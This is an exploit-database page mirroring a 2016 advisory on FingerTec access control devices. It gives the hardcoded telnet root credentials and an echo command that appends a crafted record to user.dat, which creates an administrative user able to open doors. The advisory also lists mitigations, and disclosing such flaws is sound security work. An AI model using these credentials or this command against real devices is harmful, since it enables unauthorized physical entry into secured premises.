header-logo
Suggest Exploit
vendor:
Access Control Devices
by:
Daniel Lawson
8,8
CVSS
HIGH
Hardcoded Default Root Password and Remote Enrollment
798
CWE
Product Name: Access Control Devices
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

Default Root Password and Remote Enrollment on FingerTec Devices

Almost all FingerTec Access Control devices are running with open telnet, with a hardcoded default root password. Additionally, it is trivial to enroll a new administrative user on the device with a pin code or RFID card that will allow opening the door.

Mitigation:

Disable telnet access and change the default root password.
Source

Exploit-DB raw data:

# Exploit Title: Default Root Password and Remote Enrollment on FingerTec Devices 
# Date: 12-01-2016 
# Exploit Author: Daniel Lawson 
# Contact: http://twitter.com/fang0654 
# Website: https://digital-panther.com 
# Category: physical access control 

1. Description 

Almost all FingerTec Access Control devices are running with open telnet, with a hardcoded default root password. Additionally, it is trivial to enroll a new administrative user on the device with a pin code or RFID card that will allow opening the door. 

2. Proof of Concept 

Login to telnet with the credentials: root / founder88 
At the console type in the command: 
echo -n -e \\\\x39\\\\x5\\\\x6\\\\x31\\\\x32\\\\x33\\\\x34\\\\x35\\\\x48\\\\x61\\\\x78\\\\x78\\\\x30\\\\x72\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x1\\\\x0\\\\x0\\\\x39\\\\x5\\\\x0\\\\x0 >> user.dat 
This will create a user named Haxx0r with an id of 1337 and a pin of 12345. 
--- 

Daniel Lawson 
Digital Panther Security 
https://digital-panther.com

Navigation

Suggest Exploit

Services By CQR